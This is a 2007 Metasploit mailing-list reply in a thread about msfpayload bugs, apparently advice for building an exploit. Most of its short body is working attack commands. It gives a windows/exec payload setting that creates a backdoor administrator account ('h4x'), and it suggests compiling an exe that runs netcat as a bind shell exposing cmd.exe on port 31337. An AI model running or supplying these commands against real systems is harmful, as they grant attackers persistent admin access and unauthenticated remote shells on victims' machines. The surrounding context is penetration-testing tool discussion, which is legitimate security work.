Metasploit mailing list archives

Bugs in msfpayload


From: patrick at aushack.com (Patrick Webster)
Date: Wed, 5 Sep 2007 17:23:52 +1000

For Q3,

you could just use:

set PAYLOAD windows/exec
set CMD "net user h4x passw0rd /add && net localgroup Administrators h4x
/add" (should work but untested)

and swap the Administrators group with whatever you want.

But for your exploit, why not just compile an exe that calls netcat and
binds to cmd.exe?

system("nc.exe -L -p 31337 -e cmd.exe")

and so on.

Oh and check out http://www.metasploit.com/archive/framework/msg02376.html -
the payload probably requires use of some registers.

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070905/3273ab7c/attachment.htm>


Current thread: